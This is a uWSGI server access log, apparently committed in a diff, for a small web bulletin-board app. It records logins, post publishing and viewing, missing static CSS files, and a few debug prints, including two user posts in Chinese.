+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1539/1912] 219.228.146.135 () {38 vars in 930 bytes} [Thu Jan 14 10:52:03 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1540/1913] 219.228.146.135 () {38 vars in 820 bytes} [Thu Jan 14 10:52:03 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1541/1914] 219.228.146.135 () {40 vars in 934 bytes} [Thu Jan 14 10:52:05 2021] GET /announcement/ => generated 7421 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1542/1915] 219.228.146.135 () {38 vars in 886 bytes} [Thu Jan 14 10:52:05 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1543/1916] 219.228.146.135 () {38 vars in 898 bytes} [Thu Jan 14 10:52:05 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1544/1917] 219.228.146.135 () {38 vars in 890 bytes} [Thu Jan 14 10:52:05 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1545/1918] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:52:05 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1546/1919] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:52:05 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1547/1920] 219.228.146.135 () {38 vars in 854 bytes} [Thu Jan 14 10:52:05 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1548/1921] 219.228.146.135 () {38 vars in 930 bytes} [Thu Jan 14 10:52:05 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1549/1922] 219.228.146.135 () {38 vars in 822 bytes} [Thu Jan 14 10:52:05 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1550/1923] 219.228.146.135 () {38 vars in 820 bytes} [Thu Jan 14 10:52:05 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1551/1924] 219.228.146.135 () {40 vars in 934 bytes} [Thu Jan 14 10:52:06 2021] GET /kind-manage/ => generated 13023 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1552/1925] 219.228.146.135 () {38 vars in 898 bytes} [Thu Jan 14 10:52:06 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1553/1926] 219.228.146.135 () {38 vars in 886 bytes} [Thu Jan 14 10:52:06 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1554/1927] 219.228.146.135 () {38 vars in 890 bytes} [Thu Jan 14 10:52:06 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1555/1928] 219.228.146.135 () {38 vars in 854 bytes} [Thu Jan 14 10:52:06 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1556/1929] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:52:06 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1557/1930] 219.228.146.135 () {38 vars in 874 bytes} [Thu Jan 14 10:52:06 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 26 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1558/1931] 219.228.146.135 () {38 vars in 930 bytes} [Thu Jan 14 10:52:06 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1559/1932] 219.228.146.135 () {38 vars in 822 bytes} [Thu Jan 14 10:52:07 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1560/1933] 219.228.146.135 () {38 vars in 820 bytes} [Thu Jan 14 10:52:07 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1561/1934] 219.228.146.135 () {38 vars in 890 bytes} [Thu Jan 14 10:52:15 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1562/1935] 219.228.146.135 () {40 vars in 921 bytes} [Thu Jan 14 10:52:18 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1563/1936] 219.228.146.135 () {40 vars in 918 bytes} [Thu Jan 14 10:52:20 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1564/1937] 219.228.146.135 () {48 vars in 1009 bytes} [Thu Jan 14 10:52:27 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1565/1938] 219.228.146.135 () {40 vars in 913 bytes} [Thu Jan 14 10:52:28 2021] GET /home/ => generated 8984 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1566/1939] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 10:52:42 2021] GET /all-0-0-0 => generated 9071 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1567/1940] 180.160.49.168 () {38 vars in 826 bytes} [Thu Jan 14 10:53:53 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1941] 180.160.49.168 () {40 vars in 815 bytes} [Thu Jan 14 10:53:53 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1942] 180.160.49.168 () {40 vars in 837 bytes} [Thu Jan 14 10:53:53 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1943] 180.160.49.168 () {40 vars in 819 bytes} [Thu Jan 14 10:53:53 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1944] 180.160.49.168 () {40 vars in 817 bytes} [Thu Jan 14 10:53:53 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1945] 180.160.49.168 () {40 vars in 823 bytes} [Thu Jan 14 10:53:53 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1946] 180.160.49.168 () {40 vars in 798 bytes} [Thu Jan 14 10:53:53 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1947] 180.160.49.168 () {40 vars in 812 bytes} [Thu Jan 14 10:53:53 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1948] 180.160.49.168 () {40 vars in 796 bytes} [Thu Jan 14 10:53:54 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1949] 180.160.49.168 () {40 vars in 804 bytes} [Thu Jan 14 10:53:54 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1950] 180.160.49.168 () {40 vars in 814 bytes} [Thu Jan 14 10:53:54 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1951] 180.160.49.168 () {40 vars in 869 bytes} [Thu Jan 14 10:53:54 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: 0|req: 1568/1952] 180.160.49.168 () {48 vars in 959 bytes} [Thu Jan 14 10:53:58 2021] POST /login/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1569/1953] 180.160.49.168 () {40 vars in 874 bytes} [Thu Jan 14 10:53:58 2021] GET /home/ => generated 8998 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1570/1954] 180.160.49.168 () {40 vars in 879 bytes} [Thu Jan 14 10:54:02 2021] GET /edit-pwd => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1571/1955] 180.160.49.168 () {40 vars in 881 bytes} [Thu Jan 14 10:54:02 2021] GET /edit-pwd/ => generated 6910 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1572/1956] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 10:54:17 2021] GET /all-0-0-0 => generated 9071 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1573/1957] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 10:54:28 2021] GET /all-0-0-0 => generated 9071 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1574/1958] 180.160.49.168 () {40 vars in 855 bytes} [Thu Jan 14 10:54:32 2021] GET /home/ => generated 8998 bytes in 10 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1575/1959] 180.160.49.168 () {40 vars in 881 bytes} [Thu Jan 14 10:55:04 2021] GET /all-0-0-0 => generated 9085 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1960] 180.160.49.168 () {40 vars in 814 bytes} [Thu Jan 14 10:55:04 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1961] 180.160.49.168 () {40 vars in 812 bytes} [Thu Jan 14 10:55:04 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 1576/1962] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 10:55:32 2021] GET /all-0-0-0 => generated 9071 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[]
+[pid: 11057|app: 0|req: 1577/1963] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 10:56:19 2021] GET /all-1-0-0 => generated 9071 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[]
+[pid: 11057|app: 0|req: 1578/1964] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 10:56:21 2021] GET /all-2-0-0 => generated 9071 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[]
+[pid: 11057|app: 0|req: 1579/1965] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 10:56:24 2021] GET /all-4-0-0 => generated 9071 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1580/1966] 180.160.49.168 () {40 vars in 899 bytes} [Thu Jan 14 10:58:01 2021] GET /ownpublish-0-0-0 => generated 9317 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1581/1967] 180.160.49.168 () {40 vars in 888 bytes} [Thu Jan 14 10:58:09 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1582/1968] 180.160.49.168 () {40 vars in 890 bytes} [Thu Jan 14 10:58:09 2021] GET /publish/ => generated 5234 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1969] 180.160.49.168 () {38 vars in 820 bytes} [Thu Jan 14 10:58:40 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+今天晚上有无环球港火锅干饭人? 这里有两人,一起拼吗?
+[pid: 11057|app: 0|req: 1583/1970] 180.160.49.168 () {48 vars in 1061 bytes} [Thu Jan 14 10:58:52 2021] POST /publish/ => generated 0 bytes in 19 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1584/1971] 180.160.49.168 () {42 vars in 913 bytes} [Thu Jan 14 10:58:52 2021] GET /single/1 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1585/1972] 180.160.49.168 () {42 vars in 915 bytes} [Thu Jan 14 10:58:52 2021] GET /single/1/ => generated 9442 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1973] 180.160.49.168 () {38 vars in 803 bytes} [Thu Jan 14 10:58:52 2021] GET /static/img/t_photo/wrong.jpg => generated 1420 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1974] 180.160.49.168 () {38 vars in 791 bytes} [Thu Jan 14 10:58:52 2021] GET /static/img/dianzan.png => generated 2764 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 11057|app: 0|req: 1586/1975] 180.160.49.168 () {40 vars in 877 bytes} [Thu Jan 14 10:59:10 2021] GET /home/ => generated 8998 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1587/1976] 180.160.49.168 () {40 vars in 881 bytes} [Thu Jan 14 10:59:12 2021] GET /all-0-0-0 => generated 9508 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1588/1977] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 10:59:19 2021] GET /single/1/ => generated 9442 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1589/1978] 180.160.49.168 () {40 vars in 883 bytes} [Thu Jan 14 10:59:42 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+寻找U盘 寻找掉落在图书馆的银色U盘
+[pid: 11057|app: 0|req: 1590/1979] 180.160.49.168 () {48 vars in 1063 bytes} [Thu Jan 14 11:00:36 2021] POST /publish/ => generated 0 bytes in 52 msecs (HTTP/1.1 302) 7 headers in 202 bytes (5 switches on core 1)
+[pid: 11057|app: 0|req: 1591/1980] 180.160.49.168 () {42 vars in 913 bytes} [Thu Jan 14 11:00:36 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1592/1981] 180.160.49.168 () {42 vars in 915 bytes} [Thu Jan 14 11:00:36 2021] GET /single/2/ => generated 9543 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1982] 180.160.49.168 () {38 vars in 811 bytes} [Thu Jan 14 11:00:36 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+here
+[pid: 11057|app: 0|req: 1593/1983] 180.160.49.168 () {48 vars in 968 bytes} [Thu Jan 14 11:00:44 2021] POST /single/2/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1594/1984] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:00:44 2021] GET /single/2/ => generated 9543 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1985] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:00:44 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 1595/1986] 180.160.49.168 () {40 vars in 899 bytes} [Thu Jan 14 11:00:48 2021] GET /ownpublish-0-0-0 => generated 10363 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1987] 180.160.49.168 () {40 vars in 873 bytes} [Thu Jan 14 11:00:48 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: 0|req: 1596/1988] 180.160.49.168 () {40 vars in 890 bytes} [Thu Jan 14 11:00:53 2021] GET /single/2/ => generated 9543 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1989] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:00:53 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 1597/1990] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:01:56 2021] GET /all-0-0-0 => generated 9901 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1991] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:01:56 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: 0|req: 1598/1992] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:02:07 2021] GET /single/2/ => generated 9543 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1993] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:02:07 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 1599/1994] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:02:11 2021] GET /single/1/ => generated 9442 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+here
+[pid: 11057|app: 0|req: 1600/1995] 180.160.49.168 () {48 vars in 968 bytes} [Thu Jan 14 11:03:59 2021] POST /single/1/ => generated 27 bytes in 11 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1601/1996] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:04:00 2021] GET /single/1/ => generated 9442 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+here
+[pid: 11057|app: 0|req: 1602/1997] 180.160.49.168 () {48 vars in 968 bytes} [Thu Jan 14 11:04:02 2021] POST /single/1/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1603/1998] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:04:02 2021] GET /single/1/ => generated 9442 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1604/1999] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 11:08:38 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1605/2000] 219.228.146.135 () {40 vars in 922 bytes} [Thu Jan 14 11:08:38 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+...The work of process 11057 is done. Seeya!
+worker 1 killed successfully (pid: 11057)
+Respawned uWSGI worker 1 (new pid: 661)
+123 123
+[pid: 661|app: 0|req: 1606/2001] 219.228.146.135 () {48 vars in 1100 bytes} [Thu Jan 14 11:08:53 2021] POST /publish/ => generated 0 bytes in 55 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1607/2002] 219.228.146.135 () {42 vars in 952 bytes} [Thu Jan 14 11:08:53 2021] GET /single/3 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1608/2003] 219.228.146.135 () {42 vars in 954 bytes} [Thu Jan 14 11:08:53 2021] GET /single/3/ => generated 9304 bytes in 37 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2004] 219.228.146.135 () {38 vars in 842 bytes} [Thu Jan 14 11:08:54 2021] GET /static/img/t_photo/wrong.jpg => generated 1420 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 661|app: -1|req: -1/2005] 219.228.146.135 () {38 vars in 830 bytes} [Thu Jan 14 11:08:54 2021] GET /static/img/dianzan.png => generated 2764 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+here
+[pid: 661|app: 0|req: 1609/2006] 219.228.146.135 () {48 vars in 1018 bytes} [Thu Jan 14 11:08:57 2021] POST /single/3/ => generated 27 bytes in 13 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1610/2007] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 11:08:57 2021] GET /single/3/ => generated 9304 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: -1|req: -1/2008] 219.228.146.135 () {38 vars in 830 bytes} [Thu Jan 14 11:08:57 2021] GET /static/img/dianzan.png => generated 2764 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 661|app: 0|req: 1611/2009] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 11:08:59 2021] GET /ownpublish-0-0-0 => generated 9769 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1612/2010] 219.228.146.135 () {48 vars in 1039 bytes} [Thu Jan 14 11:09:01 2021] POST /ownpublish-0-0-0 => generated 27 bytes in 28 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1613/2011] 219.228.146.135 () {40 vars in 945 bytes} [Thu Jan 14 11:09:01 2021] GET /ownpublish-0-0-0 => generated 9303 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1614/2012] 180.160.49.168 () {40 vars in 885 bytes} [Thu Jan 14 11:12:47 2021] GET /single/1/ => generated 9442 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1615/2013] 180.160.49.168 () {40 vars in 863 bytes} [Thu Jan 14 11:16:10 2021] GET /all-0-0-0 => generated 9901 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 661|app: -1|req: -1/2014] 180.160.49.168 () {40 vars in 866 bytes} [Thu Jan 14 11:16:10 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 661|app: 0|req: 1616/2015] 180.160.49.168 () {40 vars in 877 bytes} [Thu Jan 14 11:16:12 2021] GET /home/ => generated 8998 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1617/2016] 180.160.49.168 () {40 vars in 895 bytes} [Thu Jan 14 11:16:17 2021] GET /ownpublish-0-0-0 => generated 10363 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1618/2017] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:16:19 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+[pid: 661|app: 0|req: 1619/2018] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:16:20 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 661|app: 0|req: 1620/2019] 180.160.49.168 () {40 vars in 906 bytes} [Thu Jan 14 11:16:22 2021] GET /ownpublish-0-0-0 => generated 10532 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
